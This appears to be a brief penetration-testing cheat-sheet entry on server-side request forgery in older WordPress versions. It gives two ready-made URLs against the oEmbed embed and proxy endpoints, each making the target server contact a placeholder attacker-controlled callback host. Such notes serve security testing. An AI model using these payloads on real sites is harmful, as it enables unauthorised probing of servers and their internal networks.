WordPress SSRF

In old WordPress Versions, an adversary could perform an SSRF at the following endpoint. You could for example receive an HTTP request from this request. Change example.com and <COLLABORATOR_HERE> accordingly:

Embed:

https://example.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2F<COLLABORATOR_HERE>%2F

Proxy:

https://example.com/wp-json/oembed/1.0/proxy?url=https%3A%2F%2F<COLLABORATOR_HERE>%2F

Cyber Notes

WordPress SSRF